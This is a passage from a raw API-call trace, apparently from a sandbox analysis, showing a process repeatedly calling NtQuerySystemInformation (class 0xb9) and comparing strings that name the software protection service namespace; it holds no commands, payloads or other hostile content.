ResultLength=0x0) [0294.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0294.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0294.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0294.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0294.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.914] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0294.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0294.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x28, ResultLength=0x0) [0294.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0294.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0294.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e830, Length=0x20, ResultLength=0x0) [0294.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0294.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0294.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8f0, Length=0x20, ResultLength=0x0) [0294.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0294.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0294.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0294.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0294.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.989] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0295.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0295.004] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663\\2cb19a15-bab2-4fcb-acee-4bde5be207a5", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0295.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0295.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0295.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0295.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0295.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 